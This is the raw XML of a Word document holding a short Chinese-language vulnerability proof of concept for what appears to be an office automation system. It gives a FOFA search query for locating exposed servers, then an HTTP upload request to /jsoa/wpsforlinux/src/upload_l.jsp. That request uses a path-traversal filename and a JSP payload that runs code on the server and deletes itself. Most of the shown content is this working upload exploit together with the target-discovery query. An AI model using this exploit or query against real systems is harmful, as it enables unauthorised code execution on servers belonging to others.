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CC67B"/>
    <w:p w14:paraId="311362E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>资产测绘：FOFA：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>body="/jsoa/webmail/ajax_util.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68790A98"/>
    <w:p w14:paraId="497547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POC：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E48E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4D66DA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/jsoa/wpsforlinux/src/upload_l.jsp?openType=1&amp;flowflag=1&amp;userName=1&amp;recordId=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CDB1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8F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x64; rv:103.0) Gecko/20100101 Firefox/103.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E7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102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB8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text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18A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 w14:paraId="50BE85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zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8CF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 w14:paraId="05016F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 w14:paraId="02453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filename: /../../tologin.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1B9772">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5827D3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&lt;%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66125796"/>
    <w:p w14:paraId="59021B6A">
      <w:p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17856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B6389"/>
    <w:rsid w:val="309B228D"/>
    <w:rsid w:val="714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609</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>629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2024-12-20T10:02:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>默</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-20T11:10:39Z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1C55719AB9BF49759B51CA14F9FD2304_12</vt:lpwstr>
  </property>
</Properties>
</file>